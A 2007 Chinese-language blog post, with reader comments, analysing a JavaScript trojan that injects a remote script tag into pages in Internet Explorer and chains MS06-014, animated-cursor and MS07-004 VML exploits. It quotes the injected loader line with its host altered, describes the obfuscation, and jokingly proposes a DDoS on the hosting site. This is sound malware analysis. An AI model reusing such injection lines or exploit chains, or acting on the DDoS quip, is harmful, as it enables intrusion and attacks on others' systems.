有趣的木馬解剖

同事回報發生了疑似中毒事件,查看的結果,發現中毒的機器用IE讀取網頁時(包含http://www.google.com.tw)在HTML Source的最前端會被插入一列:
<script src="httq://www_blogo_tw/lan.js"></script> (註: 為防止有害URL被誤觸,我做了一些變造處理)

由這個現象,可確定是中了惡意軟體無誤,網管同事最後用AdWare SE反間諜軟體將它掃除。但我好奇它的設計原理,情不自禁又鑽了進去...

首先,lan.js長這副德行:

看起來,它將真正的程式碼中的所有英文單字先換成數字及英文字母(例如紅字部分),而對照表就是綠色的直線分隔單字清單,我猜split開來,2代表document,3代表expires,4則是var,以此類推。本想自己寫Code解碼,後來心想,這段Code本身就內建解碼器,才能還原回程式碼交給eval執行,因此我只加了幾個字,就讓原始程式現身了:

原來這個木馬的原理是這樣的,首先會檢查一個Cookie(tiantang),看看有沒有被感染過,沒有感染過的人會建立一顆RDS.DataSpace物件({CLSID:BD96C556-****-****-****-00C04FC29E36},它還故意將GUID拆成多個字串碎片逃避檢查),試圖透過MS06-014安全漏洞植入木馬(這是目前火紅的木馬植入技術呢! 例如: 這裡這裡),除此之外,它還會插入一個Iframe,理面類似lan.js,用eval執行解碼過的程式碼如下,看來就是將木馬植入使用者電腦的核心程式。

如果以上的手法失敗(表示使用者做過Windows Update了),則會端上另一道大菜,首先載入lan7.js,並把游標換成一個特定的檔案,應該是想透過微軟前陣子被發現的游標漏洞入侵使用者的電腦,至於lan7.js,則包含了以下的內容:

沒中過毒的人,會寫入Cookie(代表要進攻MS07-004漏洞? 這個Cookie真是大幅提高了程式碼的可讀性呀! 算是盜亦有道了),先document.write出一段內容,接著在五秒後轉接空白頁毁屍滅跡。再解開這個document.write,發現果然是要鑽MS07-004的向量標記語言漏洞... 其內容如下:

由這番解析,算是揭開了這隻木馬進攻的手法,全都靠Windows的漏洞,包含了動態游標漏洞、VML漏洞及RDS.DataSpace漏洞,而且還具備了多管齊下的能力。這些漏洞可怕之處在於只要開個網頁就會中標,即便沒有白目地亂開EXE、VBS、PIF,一樣會遭秧。切記,Windows Update一定要保持在最新的狀態,方為明哲保身之道!

PS: 看來www. _blogo. _tw是個大毒窰,MIS人員乾脆在DNS上把它禁掉算了。再不然,號召一些正義之士,一起對它發動DDOS攻擊也不錯,可以名正言順地攻擊網站,應該是件很爽的事吧!! (由此可以想見我是多麼想當駭客,哈!)

[2010-05-30更新]發現文中的CLSID會被防毒軟體誤判為有害,故將其中三節改為****-****-****避開。

[2018-08-26更新]屢被防毒軟體誤判,不勝其擾,程式碼改圖片。

歡迎推文分享:
Published 31 May 2007 11:17 PM 由 Jeffrey
Filed under: , ,
Views: 31,677



意見

# TeYoU said on 01 September, 2007 05:38 AM

很棒的 木馬解剖!!

推一個!

# wulm said on 23 September, 2007 01:34 AM

谢谢,学习了,转载一下

# 史蒂芬.何 said on 28 March, 2008 09:57 AM

真是精采啊!!

可否請教大大,最近常有朋友的Yahoo帳號會寄病毒信(***.zip,***.com)之類的,有沒有方法可以讓他不要再寄這類的信啊??

感恩!!

# Jeffrey said on 29 March, 2008 07:51 PM

To 史蒂芬.何, 我很少使用Yahoo Mail,沒機會研究過這類病毒的傳播原理,不過網路上有流傳加入一個0000收信人的防護法(跟隨身碟上建一個AUTORUN.INI目錄防毒有異曲同工之妙),你不妨參考看看:

www2.tsps.tpc.edu.tw/.../3331

# 史蒂芬.何 said on 06 April, 2008 09:38 AM

感恩啊!!

先用用囉!!有沒有效,再向您報告!!

感恩!!

# L said on 13 April, 2008 11:27 PM

THX !!!!

# dazuowen said on 19 May, 2008 09:30 PM

如果网被人挂了这样的木马捏,是不是服务器 也要被黑啊

# lou said on 10 February, 2009 08:05 AM

真的很棒~~

雖然我看不懂~哈~

請問一下那是哪懂得語言阿~

是屬於c大語嗎?

還是.....?

# wajika said on 14 July, 2010 08:52 PM

如何知道木马使用的是哪个漏洞呢?

比如我现在抓到一个JS木马,如何查看使用的是哪个漏洞?

# Jeffrey said on 15 July, 2010 02:40 AM

to wajika, 依我所知,只能Trace Code進行分析,再不然就是送交防毒軟體檢測,網路上有些整合式的免費服務可以試試(http://bit.ly/bhTWUn)。

# wajika said on 24 September, 2010 06:47 AM

管理员有研究信息安全吗?  如果留下MAIL,我希望能与你交流

你的看法呢?

(必要的) 
(必要的) 
(選擇性的)
(必要的) 
(提醒: 因快取機制,您的留言幾分鐘後才會顯示在網站,請耐心稍候)

5 + 3 =

搜尋

Go

<September 2010>
SunMonTueWedThuFriSat
2930311234
567891011
12131415161718
19202122232425
262728293012
3456789
 
RSS
創用 CC 授權條款
【廣告】
twMVC

Tags 分類檢視
關於作者

一個醉心技術又酷愛分享的Coding魔人,十年的IT職場生涯,寫過系統、管過專案, 也帶過團隊,最後還是無怨無悔地選擇了技術鑽研這條路,近年來則以做一個"有為的中年人"自許。

文章典藏
其他功能

這個部落格


Syndication